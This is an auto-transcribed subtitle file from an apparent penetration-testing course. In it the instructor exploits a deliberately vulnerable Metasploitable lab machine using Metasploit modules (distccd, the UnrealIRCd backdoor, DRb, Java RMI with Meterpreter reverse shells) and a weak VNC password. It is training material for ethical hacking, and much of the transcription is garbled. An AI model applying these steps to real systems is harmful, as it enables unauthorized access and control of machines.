1
00:00:00,630 --> 00:00:07,470
OK, it is time for a small challenge, we can see we are getting more and more familiar with MSF console

2
00:00:07,470 --> 00:00:14,100
and exploitation, and by now you should be familiar with the entire process of searching for a vulnerability

3
00:00:14,250 --> 00:00:15,700
and trying to exploit it.

4
00:00:16,560 --> 00:00:18,630
Let's put all of that to the test.

5
00:00:19,380 --> 00:00:25,290
So for now, recovered about four to five vulnerabilities on them at this point, the virtual machine.

6
00:00:26,270 --> 00:00:32,420
And what they want you to do in this video is find three different vulnerabilities that will give you

7
00:00:32,420 --> 00:00:34,610
a shell back on the target machine.

8
00:00:35,810 --> 00:00:42,200
You can use any tools that you want besides searching for links that will give you the exact steps to

9
00:00:42,200 --> 00:00:47,820
exploiting the vulnerability and feel free to use Google if you want to, to see if a software is vulnerable.

10
00:00:48,050 --> 00:00:51,800
You can also use search light to see whether you have it in your database.

11
00:00:52,370 --> 00:00:56,150
You can use Unmap to scan and metal framework to exploit.

12
00:00:57,120 --> 00:01:04,350
After we do this challenge, we are ready to move on to some harder Windows experts, and after that,

13
00:01:04,350 --> 00:01:11,310
we're going to see how to exploit the target without using a console and without having an expert available

14
00:01:11,310 --> 00:01:13,430
inside of our Caledonius machine.

15
00:01:14,430 --> 00:01:15,130
OK, great.

16
00:01:15,480 --> 00:01:22,290
So this video right now, give yourself 10 to 20 minutes and try to find three different vulnerabilities

17
00:01:22,530 --> 00:01:25,340
on them anticipatable, that will give you a shout back.

18
00:01:26,010 --> 00:01:27,900
I myself will do it right now.

19
00:01:28,050 --> 00:01:33,610
So if you don't want me to spoil it for you, then try to find them first and then watch this video.

20
00:01:34,020 --> 00:01:35,700
The harder part is to find them.

21
00:01:35,910 --> 00:01:38,730
However, once you find them, it is easy to exploit them.

22
00:01:39,570 --> 00:01:41,160
Let's get straight into it.

23
00:01:42,280 --> 00:01:46,750
Let's start by scanning the target for all the open ports and its services.

24
00:01:46,990 --> 00:01:53,860
So what I'm going to do is I will perform the usual and map version scan on my anticipatable and dash

25
00:01:54,070 --> 00:01:57,790
dash, which stands for scan all sixty five thousand ports.

26
00:01:58,450 --> 00:02:01,450
If I press your enter, enter my password.

27
00:02:02,000 --> 00:02:07,020
And by the way, of course, the vulnerabilities that we covered don't count at the moment.

28
00:02:07,330 --> 00:02:09,180
We will not pay attention to them at all.

29
00:02:09,190 --> 00:02:12,790
Right now we want to find new vulnerabilities.

30
00:02:13,240 --> 00:02:22,270
So while this can is working, I will go to a second terminal and I will start the NSF and I will also

31
00:02:22,270 --> 00:02:28,000
open a third terminal in case we need something like a third exploit or some other tool to run right

32
00:02:28,000 --> 00:02:28,240
here.

33
00:02:28,750 --> 00:02:31,540
So the goal is to find three vulnerabilities.

34
00:02:31,990 --> 00:02:35,380
Let's see after our scan finishes whether we manage to do so.

35
00:02:36,900 --> 00:02:42,810
And here are the results of the scan, so we got a bunch of ports open as usual, and let's go and pick

36
00:02:42,810 --> 00:02:43,550
any one of them.

37
00:02:44,720 --> 00:02:52,480
For example, I know for a fact that this this sea open port, which is three six, three two, is vulnerable.

38
00:02:52,760 --> 00:02:54,980
It is running this sea version one.

39
00:02:55,640 --> 00:03:04,370
And if I go to my mental framework and I just type search this sea, I will only get one expert available.

40
00:03:05,090 --> 00:03:08,660
This to execute or daymon command execution.

41
00:03:09,200 --> 00:03:10,600
It is ranked excellent.

42
00:03:10,940 --> 00:03:20,430
So since this is the only exploit, let's give it a try I cupitt our type used and then paste the expert

43
00:03:20,450 --> 00:03:22,130
name cleared the screen.

44
00:03:22,760 --> 00:03:25,430
We can show info just to know what this expert does.

45
00:03:25,430 --> 00:03:32,270
And it says that this module uses a documented security weakness to execute arbitrary commands on any

46
00:03:32,270 --> 00:03:39,950
system running this C CD and our system is indeed running this CD.

47
00:03:40,670 --> 00:03:47,030
So what we're going to do is we're going to type show options and set the art hosts to be the IP address

48
00:03:47,300 --> 00:03:51,130
of our anticipatable let's see payloads.

49
00:03:52,100 --> 00:03:54,110
So we got quite a few payloads right here.

50
00:03:54,410 --> 00:03:57,790
Let us use this one cmd unix reverse.

51
00:03:57,950 --> 00:04:00,260
So this is reverse DCB or Telnet.

52
00:04:00,590 --> 00:04:06,680
Let's set it right here, since at the moment if I show options, we don't have any payload setup.

53
00:04:07,460 --> 00:04:14,600
Let's set payload CMD Unix and then reverse show options once again.

54
00:04:15,260 --> 00:04:22,520
Now we need to set the host so I will type pseudo, I have config enter my password, my IP addresses

55
00:04:22,520 --> 00:04:24,810
one add to that 168, that one that eight.

56
00:04:25,760 --> 00:04:31,820
Let's go it and let's set Alto's to be equal to that IP address.

57
00:04:33,200 --> 00:04:37,810
Now if we triple check all of our available options, we should be good to go.

58
00:04:38,090 --> 00:04:39,920
Let us run our expert.

59
00:04:42,600 --> 00:04:49,760
And here it is, first one is over, we got the command session, one opened on the target machine.

60
00:04:50,280 --> 00:04:53,850
If I type who am I where Damon if I type Eltis.

61
00:04:54,990 --> 00:05:01,110
Or print working directory, we are in this directory, Hostname Command will tell us that we are at

62
00:05:01,110 --> 00:05:07,960
dislikable and your name A will tell us that we are Linux anticipatable two point six point twenty four.

63
00:05:08,430 --> 00:05:13,800
And here we also get some other information, such as bait and switch version of Linux.

64
00:05:13,800 --> 00:05:15,420
It is great.

65
00:05:15,900 --> 00:05:17,550
So first one is done.

66
00:05:17,880 --> 00:05:26,430
Let us control see this iReport session one selects and let's go back to our scan to find another vulnerability.

67
00:05:27,730 --> 00:05:34,900
So if you remember during our scans, once you perform the vulnerability scan, we notice that this

68
00:05:34,900 --> 00:05:42,610
unveil our see what's vulnerable we got from some of our scans result that this specific service is

69
00:05:42,610 --> 00:05:44,320
vulnerable to some type of the attack.

70
00:05:45,010 --> 00:05:46,510
So let's give it a try.

71
00:05:46,780 --> 00:05:52,720
Let's go to our search and type search flight or see.

72
00:05:53,820 --> 00:06:00,450
And this gives us a bunch of different information, so this isn't really useful for us.

73
00:06:01,170 --> 00:06:02,330
Let's try it like this.

74
00:06:02,370 --> 00:06:07,050
Let's go to our scan and copy on our CD, which is the version.

75
00:06:07,800 --> 00:06:11,550
And now if we type search it and then the name of the version.

76
00:06:13,040 --> 00:06:20,180
Well, we narrow it down to four results and one of them doesn't count since it is remote denial-of-service.

77
00:06:21,160 --> 00:06:26,190
Out of all of this, we got funding will be explained, which means it belongs to matters paid framework.

78
00:06:26,680 --> 00:06:31,690
It is forty three point two point eight and it is backdoor command execution.

79
00:06:32,920 --> 00:06:39,130
Let's search it inside our Tramer, so search and then unreal RC.

80
00:06:40,160 --> 00:06:43,260
And we do get indeed only one exploit for this.

81
00:06:43,280 --> 00:06:46,560
It is ranked excellent and it is from 2010.

82
00:06:47,210 --> 00:06:47,960
Let's go it.

83
00:06:49,880 --> 00:06:59,870
Right here, Copi selection and as usual, use this explained show info will tell us that this module

84
00:06:59,870 --> 00:07:06,590
exploits a malicious backdoor that was added to the Unveil ArchCity three point two point eight download

85
00:07:06,590 --> 00:07:07,190
archive.

86
00:07:07,770 --> 00:07:13,430
So as it says, this module will exploit some malicious backdoor that was added in the specific version.

87
00:07:13,920 --> 00:07:22,670
And if we show options, we need to set the hosts as in the previous exploit, and we also need to set

88
00:07:22,670 --> 00:07:23,440
the payload.

89
00:07:23,450 --> 00:07:26,480
But before we set it, let's show our available payload first.

90
00:07:27,940 --> 00:07:33,190
Shopaholics, pardon me, not show options, and we get the same result as previously, so we are just

91
00:07:33,190 --> 00:07:36,280
going to go with the reverse DCP over Telnet.

92
00:07:39,270 --> 00:07:45,900
And if I typeset payload and then paste the payload name, now we need to set the outpost to be the

93
00:07:45,900 --> 00:07:52,320
IP address of our clinics machine and if we triple check our options, everything is set to run.

94
00:07:55,930 --> 00:08:02,400
And here it is, menschel session to open, we got the second exploit down.

95
00:08:03,010 --> 00:08:04,340
Let's check out if it works.

96
00:08:04,360 --> 00:08:04,870
Who am I?

97
00:08:05,170 --> 00:08:09,460
We are different account host named Will tell us we're about to split up.

98
00:08:09,640 --> 00:08:11,510
So this is the second one down.

99
00:08:12,040 --> 00:08:13,960
We got one more left to go.

100
00:08:14,560 --> 00:08:19,210
Let let's control see this go back to our skin.

101
00:08:19,720 --> 00:08:25,990
And we are doing this really fast tempo because we already are familiar with all of these tools and

102
00:08:25,990 --> 00:08:29,230
techniques that we use to exploit these vulnerable softwares.

103
00:08:30,300 --> 00:08:35,140
If you didn't manage to find three different experts, don't worry, this comes with the practice.

104
00:08:35,340 --> 00:08:40,600
So after some time practicing, you will be able to find even more than three exploits.

105
00:08:41,460 --> 00:08:43,400
Let's continue on the third one.

106
00:08:44,040 --> 00:08:50,700
So if we go down here and check out what different services we got running this one, which is running

107
00:08:50,700 --> 00:08:57,590
over Port eight, seven, eight, seven running service Diyab, I know for a fact that it is vulnerable,

108
00:08:58,380 --> 00:08:59,720
so let's give it a try.

109
00:09:00,120 --> 00:09:01,800
The service theme is DRP.

110
00:09:02,310 --> 00:09:05,970
See if I type in my search fluid DRP.

111
00:09:07,280 --> 00:09:13,880
Well, we only get the results right here, and it doesn't seem that any one of them belongs to them

112
00:09:13,880 --> 00:09:17,830
at this point framework, as we can see right here, since these are Python files.

113
00:09:18,500 --> 00:09:21,560
So let's just double check what's not here.

114
00:09:22,220 --> 00:09:23,690
Let's just double check right here.

115
00:09:23,810 --> 00:09:28,720
If we can find something regarding DRP and we do manage to find it.

116
00:09:29,450 --> 00:09:38,960
So we got these two exploits which are for the multi and we got this DRP remote code execution and it

117
00:09:38,960 --> 00:09:41,840
says Distributed Ruby Remote Code Execution.

118
00:09:41,990 --> 00:09:46,210
And DeFago right here under the version, we can see that it is running Ruby.

119
00:09:47,000 --> 00:09:48,860
So let's just give it a try.

120
00:09:48,890 --> 00:09:51,230
You never know if we copy this exploit.

121
00:09:52,140 --> 00:09:56,130
Which says Derby remote code execution, and we use it right here.

122
00:09:59,270 --> 00:10:00,450
Show our options.

123
00:10:00,480 --> 00:10:09,320
We can see by default it has set the payload to be CMD Unix reverse net kit and we got two different

124
00:10:09,320 --> 00:10:10,250
things to set up.

125
00:10:10,850 --> 00:10:14,480
Matter of fact, one of them is you are right, which is not really needed.

126
00:10:14,480 --> 00:10:16,400
So we can only set our hosts.

127
00:10:17,410 --> 00:10:22,360
And for some reason, it does say that our host is not required, but I'm not really sure how it is

128
00:10:22,360 --> 00:10:31,000
not required, so we will just specified anyway that our hosts want to do that 168 at one dot seven

129
00:10:31,750 --> 00:10:33,890
since the payload is already being set.

130
00:10:33,970 --> 00:10:35,870
Let us just run the exploit.

131
00:10:37,430 --> 00:10:42,590
And here it is, we got commensal session three open.

132
00:10:44,280 --> 00:10:45,570
Let's type who am I?

133
00:10:46,440 --> 00:10:51,900
We are route account, and once again, Hostname will tell us where matters political machine.

134
00:10:52,680 --> 00:10:55,920
And with this we completed our challenge.

135
00:10:56,360 --> 00:11:00,360
We found three different vulnerabilities that gave us a shellback.

136
00:11:01,140 --> 00:11:02,610
But these are not the only ones.

137
00:11:02,850 --> 00:11:08,010
Matter of fact, let me just show you one or two more that you could have found if you perform this

138
00:11:08,010 --> 00:11:08,490
challenge.

139
00:11:09,180 --> 00:11:17,100
The one that is a little bit different to exploit is this VMC service running on Port five nine zero

140
00:11:17,100 --> 00:11:17,400
zero.

141
00:11:17,790 --> 00:11:19,800
It is running Protocol three point three.

142
00:11:20,340 --> 00:11:29,010
And if we just search in the search deployed search and C search deployed, Vincey, we will get a bunch

143
00:11:29,010 --> 00:11:30,090
of the results right here.

144
00:11:30,300 --> 00:11:32,460
So let's add the version three point three.

145
00:11:33,180 --> 00:11:35,640
And we do get some of the responses right here.

146
00:11:35,850 --> 00:11:38,870
But it does say that these are four windows.

147
00:11:39,810 --> 00:11:45,320
Now, we are not going to give up just because we cannot find the exploit using search plate.

148
00:11:46,310 --> 00:11:51,650
Matter of fact, it probably is somewhere right here, just there is a bunch of result and we don't

149
00:11:51,650 --> 00:11:54,800
really want to read through all of this to find the expert that we need.

150
00:11:55,250 --> 00:11:59,120
So let's just go straight to the point and type search and see.

151
00:11:59,780 --> 00:12:02,960
And if we scroll all the way up, since these are just paillard.

152
00:12:04,640 --> 00:12:12,470
I come to exploit we can see there about five or six experts, and these four are four windows, so

153
00:12:12,470 --> 00:12:14,410
we can forget about them straight away.

154
00:12:15,080 --> 00:12:18,720
We got this one and we got this one.

155
00:12:19,970 --> 00:12:21,510
This one seems interesting.

156
00:12:21,770 --> 00:12:27,740
It is an expert for multiple operating systems for Vincey and it says Vincey, keyboard execution.

157
00:12:29,170 --> 00:12:32,080
So let's just copy the name and see whether it works.

158
00:12:32,540 --> 00:12:35,080
Now, this is just a part of penetration test.

159
00:12:35,380 --> 00:12:40,780
If you don't know an exact exploit, you simply just try a few different ones and see if they work,

160
00:12:41,230 --> 00:12:47,110
just get used to it that some exploits will sometimes not work and you will have no idea why they don't

161
00:12:47,110 --> 00:12:47,440
work.

162
00:12:48,340 --> 00:12:54,130
So they just type set or pardon me, just type use and then the expert name.

163
00:12:55,820 --> 00:13:02,820
And this seems that it isn't an exploit for us, since it is also setting the windows paillard.

164
00:13:03,590 --> 00:13:06,790
Hmm, we cannot find, have we and seek exploit.

165
00:13:06,860 --> 00:13:07,930
So what are we going to do?

166
00:13:08,910 --> 00:13:15,090
Well, if I go right here and instead of searching for an exploit, I simply just try to connect to

167
00:13:15,090 --> 00:13:18,330
the V.A. using a tool called vascular.

168
00:13:18,900 --> 00:13:24,280
And all I need to specify to connect to is the IP address to that target machine.

169
00:13:25,800 --> 00:13:26,510
Press enter.

170
00:13:26,910 --> 00:13:27,300
Hmm.

171
00:13:27,600 --> 00:13:29,910
It seems to be asking for a password.

172
00:13:30,510 --> 00:13:37,230
Well, let's try MSF admin, which is the usual password for everything in Anticipatable and it tells

173
00:13:37,230 --> 00:13:39,090
us authentication, failure.

174
00:13:39,690 --> 00:13:44,220
But if we try it once again and as a password, I simply just type password.

175
00:13:46,060 --> 00:13:55,000
Well, it worked, the Vincey viewer password was just password, and now I got through Chele opened

176
00:13:55,150 --> 00:13:58,480
on Demetris potable, I can execute commands right here such as?

177
00:13:58,480 --> 00:14:05,040
I have config such as hostname kallus and I can see anything that is on the target machine.

178
00:14:05,470 --> 00:14:09,730
So this was a little bit different because it was due to a weak password.

179
00:14:09,730 --> 00:14:17,470
I just connected to the B and C and I typed password and it granted the access to the shell of the anticipatable.

180
00:14:18,250 --> 00:14:20,140
Great to Exeter's.

181
00:14:20,140 --> 00:14:24,040
I can type exit and I can exit this desktop right here.

182
00:14:24,790 --> 00:14:28,360
And let me show you just one more and then we are going to end the video.

183
00:14:29,320 --> 00:14:33,400
And that one is over port one zero nine nine.

184
00:14:34,150 --> 00:14:42,790
It is running Java RMI and if I go in my Mattapoisett framework and search for Java, underscore RMI.

185
00:14:44,390 --> 00:14:47,300
Well, we get to exploit right here.

186
00:14:48,490 --> 00:14:56,500
Let's try with this one first, so exploit multi Misk Java, RMI server Copi, the exploit name go right

187
00:14:56,500 --> 00:14:57,610
here and type use.

188
00:14:59,450 --> 00:15:04,750
It set the default payload to be Java Mehtar, better reverse DCP.

189
00:15:05,630 --> 00:15:09,560
Now this is the first time that we are encountering amateur Peter payload.

190
00:15:10,130 --> 00:15:15,140
You will see that it is a little bit different than all the other shells that we got in the previous

191
00:15:15,470 --> 00:15:16,050
exploits.

192
00:15:16,640 --> 00:15:18,410
So if it type show options.

193
00:15:19,840 --> 00:15:25,810
There are a bunch of things that I need to set our payload options has already been set to correct one

194
00:15:26,200 --> 00:15:28,810
to the correct IP address and to the correct port.

195
00:15:29,380 --> 00:15:32,010
All we need to set right here is the our hosts.

196
00:15:32,800 --> 00:15:38,350
You can just leave the server hosted in Server Port to be zero point zero point zero point zero and

197
00:15:38,350 --> 00:15:39,030
eighty eight.

198
00:15:39,730 --> 00:15:46,870
If it go right here and typeset our hosts one, add to that 168 that funded seven and I run this.

199
00:15:49,330 --> 00:15:57,250
Well, here it is, we got the interpreter session for Open, and if you want to execute the commands,

200
00:15:57,760 --> 00:15:59,760
you can just wait for this expert to finish.

201
00:15:59,770 --> 00:16:06,970
And even though it says right here it failed, if I type sessions, I will have the matter session for

202
00:16:07,270 --> 00:16:10,000
and I can enter that session by typing sessions.

203
00:16:10,000 --> 00:16:17,950
And then I and then the idea of that session, which in my case is four and I've entered the interpreter

204
00:16:17,950 --> 00:16:18,280
shall.

205
00:16:19,400 --> 00:16:25,120
Right here, the comments are different to check out all of the comments that we can run with an interpreter,

206
00:16:25,130 --> 00:16:31,190
we can type the help comment, and you can see it is split into different sections, such as filesystem

207
00:16:31,190 --> 00:16:33,680
commands, such as core commands.

208
00:16:33,920 --> 00:16:39,650
And all of these commands work with Metropia there shall we can download and upload files.

209
00:16:40,250 --> 00:16:44,570
We can execute a command, we can screen share.

210
00:16:44,600 --> 00:16:46,940
We can perform a screenshot of the target machine.

211
00:16:47,480 --> 00:16:52,400
We can record the microphone and many other things that we're going to check out later.

212
00:16:52,910 --> 00:17:00,260
But for now, we can use a comment called Shell to enter the command shell with the target machine.

213
00:17:00,380 --> 00:17:02,030
So if I type who am I once again?

214
00:17:02,450 --> 00:17:06,760
Right now, I'm a remote account for the IP address of the Anticipatable.

215
00:17:07,520 --> 00:17:15,110
Great, now I let this matter potential for the end, just so we can slowly start getting into using

216
00:17:15,230 --> 00:17:20,270
interpreters on our target machine, as we can see, there is a lot of the commands that we can run.

217
00:17:21,080 --> 00:17:27,480
Now, in the next video, we're going to start with those exploitation and invidious exploitation.

218
00:17:27,650 --> 00:17:30,260
We are most likely always going to want to open.

219
00:17:30,280 --> 00:17:31,280
I'm a therapist, Rachelle.

220
00:17:32,400 --> 00:17:37,040
So that would be about it for this challenge, once again, if you managed to find three different vulnerabilities,

221
00:17:37,050 --> 00:17:38,030
congratulations.

222
00:17:38,040 --> 00:17:41,130
If not, don't worry, this comes with practice.

223
00:17:42,300 --> 00:17:48,240
Now that the government has political vulnerabilities which are rather easy, it is time to move on

224
00:17:48,240 --> 00:17:49,900
to the windows vulnerabilities.

225
00:17:50,400 --> 00:17:51,330
See you in the next video.